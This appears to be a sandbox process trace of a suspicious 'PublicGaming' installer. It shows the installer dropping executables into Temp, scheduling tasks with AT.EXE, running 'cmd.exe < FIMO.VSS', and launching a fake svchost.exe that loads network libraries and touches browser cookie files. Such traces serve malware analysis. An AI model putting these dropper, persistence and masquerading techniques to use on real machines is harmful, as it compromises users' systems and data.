C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\5EWXH2EKYNLALY8QH70N.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFBC3C.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
3872
Image path
"C:\PROGRAM FILES (X86)\PUBLICGAMING\APPSETUP.EXE"
Time lapse
48.065084
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\NTDLL.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\ADVAPI32.DLL
C:\WINDOWS\SYSWOW64\WINMM.DLL
C:\WINDOWS\SYSWOW64\WS2_32.DLL
C:\WINDOWS\SYSWOW64\POWRPROF.DLL
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WSHTCPIP.DLL
C:\WINDOWS\SYSWOW64\EN-US\WSHTCPIP.DLL.MUI
C:\WINDOWS\SYSWOW64\WSHIP6.DLL
C:\WINDOWS\SYSWOW64\EN-US\WSHIP6.DLL.MUI
C:\WINDOWS\SYSWOW64\WSHQOS.DLL
C:\WINDOWS\SYSWOW64\EN-US\WSHQOS.DLL.MUI
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\WINDOWS\SYSWOW64\KERNEL32.DLL
3880
Image path
"C:\PROGRAM FILES (X86)\PUBLICGAMING\PRUN.EXE"
Time lapse
48.153887
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\NTDLL.DLL
C:\WINDOWS\SYSWOW64\KERNEL32.DLL
C:\PROGRAM FILES (X86)\PUBLICGAMING\PRUN.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
Process children
3952
Image path
"C:\PROGRAM FILES (X86)\PUBLICGAMING\PRUN.EXE"
Time lapse
49.940695
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\IPHLPAPI.DLL
C:\WINDOWS\SYSWOW64\WINNSI.DLL
C:\WINDOWS\SYSWOW64\MSWSOCK.DLL
C:\WINDOWS\SYSWOW64\WSHIP6.DLL
C:\WINDOWS\SYSWOW64\WSHTCPIP.DLL
C:\WINDOWS\SYSWOW64\DNSAPI.DLL
C:\WINDOWS\SYSWOW64\RASADHLP.DLL
C:\WINDOWS\SYSWOW64\FWPUCLNT.DLL
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\P3.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\KARA.EXE
C:\WINDOWS\SYSWOW64\NTVDM64.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\1.EXE
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\JHUIMME.EXE
Process children
2792
Image path
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\P3.EXE
Time lapse
72.382341
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\SYSWOW64\DWMAPI.DLL
C:\WINDOWS\FONTS\STATICCACHE.DAT
C:\WINDOWS\SYSWOW64\OLE32.DLL
C:\WINDOWS\SYSWOW64\EN-US\MSCTF.DLL.MUI
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\P3.EXE
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\ZOLLBYVRLZOLVDRSHN\AVRAI.VSS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\ZOLLBYVRLZOLVDRSHN\FIMO.VSS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\ZOLLBYVRLZOLVDRSHN\ORA.VSS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\ZOLLBYVRLZOLVDRSHN\VENIR.VSS
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\IEFRAME.DLL
C:\WINDOWS\SYSWOW64\OLEACC.DLL
C:\WINDOWS\SYSWOW64\OLEACCRC.DLL
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\PROPSYS.DLL.MUI
C:\WINDOWS\SYSWOW64\AT.EXE
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\CMD.EXE
Process children
1576
Image path
"C:\WINDOWS\SYSTEM32\AT.EXE"
Time lapse
72.834743
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\ZOLLBYVRLZOLVDRSHN
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
C:\WINDOWS\SYSWOW64\SCHEDCLI.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\AT.EXE.MUI
C:\WINDOWS\SYSWOW64\NETMSG.DLL
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\CREDSSP.DLL
C:\WINDOWS\SYSWOW64\MSV1_0.DLL
C:\WINDOWS\SYSWOW64\CRYPTDLL.DLL
C:\WINDOWS\SYSWOW64\EN-US\NETMSG.DLL.MUI
3656
Image path
"C:\WINDOWS\SYSTEM32\CMD.EXE" /C C:\WINDOWS\SYSTEM32\CMD.EXE < FIMO.VSS
Time lapse
72.928343
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\ZOLLBYVRLZOLVDRSHN\FIMO.VSS
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\CMD.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
Process children
3664
Image path
C:\WINDOWS\SYSTEM32\CMD.EXE
Time lapse
72.975143
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\WINDOWS\BRANDING\BASEBRD\BASEBRD.DLL
C:\WINDOWS\BRANDING\BASEBRD\EN-US\BASEBRD.DLL.MUI
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\ZOLLBYVRLZOLVDRSHN\FIMO.VSS
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
3300
Image path
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\1.EXE
Time lapse
110.527811
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\1.EXE
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.VISUALBAS#\08D608378AA405ADC844F3CF36974B8C\MICROSOFT.VISUALBASIC.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.VISUALBASIC\8.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DRAWING\DBFE8642A8ED7B2B103AD28E0C96418A\SYSTEM.DRAWING.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.WINDOWS.FORMS\3AFCD5168C7A6CB02EAB99D7FD71E102\SYSTEM.WINDOWS.FORMS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.WINDOWS.FORMS\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DRAWING\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\VBC.EXE
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\TEMP\SVCHOST.EXE
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\SVCHOST.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATION\BC09AD2D49D8535371845CD7532F9271\SYSTEM.CONFIGURATION.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION\2.0.0.0__B03F5F7F11D50A3A
Process children
3260
Image path
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\SVCHOST.EXE
Time lapse
110.74621
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\NETAPI32.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\WKSCLI.DLL
C:\WINDOWS\SYSWOW64\DSROLE.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\BCRYPT.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\WININET.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\INDEX.DAT
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\COOKIES\INDEX.DAT
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\HISTORY\HISTORY.IE5\INDEX.DAT
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\WINDOWS\SYSWOW64\DNSAPI.DLL
C:\WINDOWS\SYSWOW64\IPHLPAPI.DLL
C:\WINDOWS\SYSWOW64\WINNSI.DLL
C:\WINDOWS\SYSWOW64\RASAPI32.DLL
C:\WINDOWS\SYSWOW64\RASMAN.DLL
C:\WINDOWS\SYSWOW64\RTUTILS.DLL
C:\WINDOWS\SYSWOW64\SENSAPI.DLL
C:\WINDOWS\SYSWOW64\NLAAPI.DLL
C:\WINDOWS\SYSWOW64\RASADHLP.DLL
C:\WINDOWS\SYSWOW64\NAPINSP.DLL
C:\WINDOWS\SYSWOW64\PNRPNSP.DLL
C:\WINDOWS\SYSWOW64\MSWSOCK.DLL
C:\WINDOWS\SYSWOW64\WINRNR.DLL
C:\WINDOWS\SYSWOW64\WSHTCPIP.DLL
C:\WINDOWS\SYSWOW64\WSHIP6.DLL
C:\WINDOWS\SYSWOW64\FWPUCLNT.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\NETPROFM.DLL
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\WINDOWS\SYSWOW64\RPCRTREMOTE.DLL
C:\WINDOWS\SYSWOW64\NPMPROXY.DLL
C:\WINDOWS\SYSWOW64\DHCPCSVC.DLL
C:\WINDOWS\SYSWOW64\DHCPCSVC6.DLL
Registry Accessed
\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\WSMAN